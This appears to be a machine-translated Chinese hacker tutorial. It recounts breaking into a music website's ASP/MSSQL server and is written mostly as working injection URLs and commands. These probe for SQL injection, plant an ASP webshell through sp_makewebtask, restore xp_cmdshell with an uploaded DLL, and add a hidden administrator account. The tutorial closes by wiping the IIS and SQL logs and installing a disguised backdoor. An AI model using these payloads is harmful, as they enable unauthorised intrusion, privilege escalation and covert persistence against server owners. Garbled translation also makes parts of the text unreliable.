One. The principle of WebShell is injected through SQL:
N.E.V.E.R: WEBSHELL is obtained using database backup. Create a table and build a field in the table to save Trojan data. Then use the MSSQL export library file to export the entire data, and finally delete the new table.
Analysis: n.e.v.r utilizes the MSSQL backup database function. Export the data, envisure the ASP laminar, export files, export files, file names in the database, and file names in the form of .asp. Then the file is saved in the path to the web. So what is the statement that this exported ASP file is to explain <%%>? If there is a <%%> standard in the table in the database, and there is an error in this, then the ASP file we exported will be incorrect. However, this opportunity is not too big.
Let's take a look at the CZY method.
CZY method: The method of front and n.e.v.e is basically almost similar. Just use the extended stored procedure - SP_MAKEWEBTASK. This extension stored procedure is to export records in a table in the MSSQL database, saved in a file method. This method does not have any problem that we only go to read the values in a field in the table. Guide the information of the field to generate a file. The value in this field is our just added. When you join the data, please quit first, no problem is joining, and there is certainly no problem.
I have been manually tested by two methods. Use SQL to inject the vulnerability, build the table, add data to the table, and then export data, then delete the table. Both use the SQL statement. I don't have much to say this here, everyone can see the article in this issue.
At present, I am very popular on the Internet, that is, the SQL injection vulnerability we usually say, we use this kind of vulnerability to query database information, cross-library, and to upload files through the forum to get the host Webshell (these are some very Usually, the black defense is also described in detail.
Some time ago I conducted a large music toll website for a large music fee. As a result, I used pure script technology to get system administrator privileges. So, today I will introduce all the concrete ideas for all and my specific ideas.
One. Stepping
Stepping on, is the primary work for a server for security testing. Let's take a port scan for the server. I took out a very good scanner written by my friends, the speed is quite fast, you can open 2000 threads at the same time! (WTF: Good!) Half Skills, the port 1-65535 is over.
The open port of the scan is as follows:
21, 80, 1433, 3389
The result of scanning again is the same, almost certainly these. After the impact wave, the server on the network has a lot of security, and the system vulnerability invasion has become difficult. Let me analyze it first: I set the target in 21 and 1433 ports. Now I only look at luck, see if I can sweep out a weak password (WTF: Oh, I want to be very beautiful!) - I am unlucky, I haven't swept it for a long time, I have a moving machine, what is the same today, what Didn't sweep it out. It seems that I only look for an exit from the website script.
two. Full-around exploration of the website
Opened 1433 port, the SQL Server service, the general website is the ASP MSSQL structure to set up, and the injection vulnerability of the ASP script is better than other script vulnerabilities, and the vulnerability has a much more relatively much. Under normal circumstances, I add single quotes after the parameters submitted. If the parameter is not filtered, IE generally returns an error message. I quickly found a parameter without any filtering.
Submitted: http://www.something.com/script.asp? Id = 2 '
IE returns:
Microsoft OLE DB Provider for ODBC Drivers Errors '80040e14'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] string '' has no closed quotes.
Submitted: http://www.something.com/script.asp? Id = 2 and 1 = 1 IE Returns normal record. Submitted: http://www.something.com/script.asp? Id = 2 and 1 = 2 IE did not return record. Ok, this is determined that there is a vulnerability, let's take advantage of this vulnerability to get some information about the server and database. For example, if you want to see the patch of the server, we submit: http://www.something.com/script.asp?id=2 and 1 = (Select @@ Version) error, huh, ie, IE returned to the error message As shown in Figure 1: Figure 1 seems to play the SP4 patch, "It is said" After the SP4, there is also an overflow program for 80 and the overflow of MSSQL SP3. However, these are "absolute confidential", it is estimated that there are few people who can get it, and I don't have it anyway, I will take him on that day! Now let's continue! This server is more secure from the system, so I still have to start from scripting. Let's take a look at the permissions of his database connection account, submit: http://www.something.com/script.asp?id=2 and 1 = (select is_srvrolemember ('sysadmin')) Returns normal The account is the server role sysadmin authority. WTF: Is_SrvroleMember ('role' [, 'login'] function is used to determine if the current user login is a member of the specified server role. Among them, Role is the name of the server role being checked. Login is optional, if not specified, then use the current user's login account. If Login is a member of the Role, return 1, not returning 0, if the Role or Login is invalid, then return null. I almost didn't spray a tea in my mouth on the computer screen. The server role currently connected to the account is actually sysadmin permissions! As shown in Figure 2: Figure 2 Haha! It seems that the connection account is connected to the SA account. Submitted: http://www.something.com/script.asp?id=2 and 'sa' = (SELECT System_User) Used to view the connection account is not connected with SA, IE returns to normal again. This proves that the connection account is really sa, it seems that the permissions are so high. WTF: When using the application role, execute the Select User will return the name of the currently used application role. If you want to get the identity of the logged in user, use the Transact-SQL statement: SELECT System_User. Here, many people may think of using the XP_cmdshell extension stored procedure to add system accounts, and then use the terminal to connect the server.
This is very good idea! I am also a member of many people! Let's try to see it! three. Use the MSSQL stored procedure to get the WebShell, let's see if Xp_cmdshell is deleted by the administrator! Submitted: http://www.something.com/script.asp?id=2 and 1 = (Select Count (*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') IE Returned The information is as follows: adodb.field error '800A0bcd'
One of BOF or EOF is "true", or the current record has been deleted, and the required operation requires a current record.
It seems that XP_cmdshell has been deleted. Oh, let's recover him! http://www.something.com/script.asp?id=2 ;Exec Master.dbo.sp_addextendedProc 'XP_CMDSHELL', 'XPLOG70.DLL' Try again, see XP_CMDSHELL is recovering? http: // www. Something.com/script.asp?id=2 and 1 = (Select Count (*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') WTF: Xiaobian in later attempts, found What is the XP_cmdshell recovery? Haha, I don't know which brother left the result? The same is not returned. This proves that the administrator is renamed this dynamic link library of XPLog70.dll. If you don't delete it, it seems that direct recovery is no way. In this regard, I can only say two words "I forbearance"! Such a lot of vulnerabilities, it is not good to use it, I am not willing to say this, it is powerful. Let's talk about him first, hey, after getting Webshell, I naturally have a way to deal with him, hahaha ... (Stariser smile!). See how to get WebShell! Have you seen n.e.v.e.r and czy's article? Take the Webshell method, both have been introduced in detail. I also write their methods into procedures, convenient for me, but it is difficult to get the web absolute path. Where is the Trojan we generated? This may be a problem that many cattle have been studying. Fortunately, I still understand MSSQL. I have a way to get his web absolute path, come with me. (WTF: This is definitely a very very big flash point! Everyone sees!) Let's take advantage of two MSSQL stored procedures. However, it is necessary to introduce you to the XP_REGREAD extension stored procedure and sp_makewebtask web assistant stored procedure: XP_REGREAD is used to read the registry information, and we get this stored procedure to save the web absolute path in the registry. SP_MAKEWEBTASK is used here to get WebShell, its main function is to export records for the table in the database, and the file name you can specify yourself. Of course, we specify as an ASP script file! Imagine if the script code is saved in the table, the file is the script file. So, the record we add is the script code. Here I don't have to use n.e.v.e.r. His way is to export library files, exported files are relatively large, and many garbled looks inconvenient, if there is an ASP tag, there is a wrong ASP code, it is not good, open Most Return 500 error The code, so we use CZY methods, which is the web job to get the shell. 1. How can I get the web absolute path? Ha ha? This problem, I spent a long time to study.
Everyone knows that Ms's things are placed in the registry. We can get in the registry, the location is as follows: hkey_local_machine / system / controlset001 / service / w3svc / param ETERS / VIRTUAL ROOTS Using the extended stored procedure XP_REGREAD We can Obtaining its value. EXEC MASTER.DBO.XP_REGREAD 'HKEY_LOCAL_MACHINE', 'System / Controlset001 / Services / W3SVC / Parameters / Virtual Roots', '/' This is taken, but the problem is coming, take it out How do we return it in IE? My method is: Create a temporary table, add a field in the table, type: char 255. Oh, use it to save the value of the absolute path of the web. After the table is built, we use the method of reading the registry to save the returned value in a variable. Then add the record (ie the value of the variable) to the new table. In this way, the path is written to the table. Submit: DECLARE @result varchar (255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM / ControlSet001 / Services / W3SVC / Parameters / Virtual Roots', '/', @result output into a temporary table (field name provisional) insert VALUES (@Result); - then let us submit: 1 = (Select Count (*) from temporary table where temporary field name> 1) This IE reports the value of the web path you just plugged in. . I also tried to use the variable to report the error, let IE return the value of the variable, the result is failed, so I think the way to build a temporary table add data! Finally, we delete the temporary table of the original built. WebShell gets it, and the work will tell a paragraph. 2. How do I get the article of WebShell? CZY has been written very detailed. So, I just simply mention it! Create a table, build a field, and add the contents of the Trojan to this field. Then, the content is exported to the ASP script in the web absolute path via the XP_MAKEWEBTASK stored procedure. Remove the built-in temporary table again, everything over. Such as: execute sp_makewebtask @outputfile = 'web absolute path / export file name .asp', @query = 'SELECT Your field from you, your temporary table' Oh, the result is coming out. Of course, I have written a procedure, so I don't have to have trouble yourself and a line of add data (WTF: this article has a detailed introduction! Everyone will not be disappointed!). Methods and ideas are written, now let's take action. Still look at it first, his two extended stored procedures have been deleted.
If I was deleted, I don't want to live! Oh, submitted: http://www.something.com/script.asp?id=2 and 1 = (Select Count (*) from master.dbo.sysobjects where name = 'xp_regread') Add: http: // Www.something.com/script.asp?id=2 and 1 = (Select Count (*) from master.dbo.sysobjects where name = 'sp_makewebtask') La la la! What day is today, I am happy than the New Year. All returned to normal! The two stored procedures to be used are not deleted. WTF Note: General administrators will not delete these two, maybe less understanding them, and will not pay attention to them! The crisis is in this!嘿嘿. Ok, after getting a web absolute path. Continue to build a table: http://www.something.com/script.asp?id=2;create table [dbo]. [Cyfd] ([GYFD] [char] (255)); then we succeeded A table named CYFD and adding a type of Char, a field name GYFD with a length of 255. Then add data to the table: http://www.something.com/script.asp?id=2; Declare @Result varchar (255) EXEC MASTER.DBO.XP_REGREAD 'HKEY_LOCAL_MACHINE', 'SYSTEM / Controlset001 / Services / W3SVC / Pa Rameters / Virtual Roots', '/', @Result Output INSERT INTO CYFD (@Result); - Read the web absolute path from the registry, then insert the path into the table just built. Then report the absolute path of WebShell: http://www.something.com/script.asp?id=2 and 1 = (Select Count (*) from cyfd where gyfd> 1) After the error, IE returns an error, we get Web absolute path "D: / INETPUB / WWWROOT"! After the effort, it is very sweet! Drink tea! As shown in Figure 3, Figure 3 and then delete the table that has just been built, submitted: http://www.something.com/script.asp?id=2: Drop Table Cyfd; - OK, there is a path under the path. Open the program I write to get the WebShell, enter the vulnerability URL: http://www.yfd.com/yfd.com? Id = 2 Enter the absolute path for saving Trojans: D: / inetpub / wwwroot. Trojan, I have been configured, the code is streamlined and streamlined, only 30 lines of code, so that the data is submitted to the server. Accelerate speed! The main function of the Trojan is the input content, saving the input content as a file. Oh, through such a Trojan, we can achieve some powerful script Trojans, such as ocean horses. Not a minute. The programs have been running.
Enter the corresponding path, Wahaha (WTF: Brothers who want to eat this "drink"? Haha!), WebShell is coming, the fastest speed has a marine Trojan, as shown in Figure 4, Figure 5: Figure 4 Figure 5 I live In happiness! - wtf often says this sentence, I seem to have been infected today! Below we have come! Four. Restore xp_cmdshell, enter system authority! The following work is very simple, it is very easy. If you don't get 10 minutes, you will give you an administrator account, saying XP_cmdshell has been deleted. And it is impossible to recover, this is the administrator to delete the XPLog70.dll file, or no name. Nothing, let's upload an XPLog70.dll to get everything, through WebShell. I quickly uploaded the XPLog70.dll file to the E: / inetpub / wwwroot directory, come, let's return to him, submit: http://www.something.com/script.asp?id= 2; exec master.dbo.sp_addextendedProc 'xp_cmdshell', 'E: /inetpub/wwrowroot/xplog70.dll' recovery, supports the absolute path recovery. :) Figure 6 Figure 6 ok. We use IE to see if it has been restored. Submitted: http://www.something.com/script.asp?id=2 and 1 = (Select Count (*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') 嘿嘿. Returns normal. Has been restored, do you still use me? Ha ha! Account: http://www.something.com/script.asp?id=2 ;ec master.dbo.xp_cmdshell 'net user chouyfd Chouyfd1314yf / add' upgraded ourselves for super administrators http://www.something.com /script.asp?id=2 ;exec master.dbo.xp_cmdshell 'net localgroup administrators chouyfd / add' is over. Open your terminal connection, join! Haha, finally gave me. At this point, I successfully got the system administrator account of this host. As shown in Figure 7: Figure 7 The following work is to clear the log and leave a super back door, flash! Five. Afterwards, after the work terminal is connected, remove the IIS log, and the MSSQL log at the fastest speed. At the same time, put XP_cmdshell also deleted him, don't let him find it, it will not do it. Move the XPLog70.dll I uploaded to the System32 directory, changed to me, I don't know what the name is called: msxlog32.dll (kill him also can't find it, haha!) Will provide the pigs to the super The kernel back door program is installed, and the script file with a vulnerability is put on the patch.
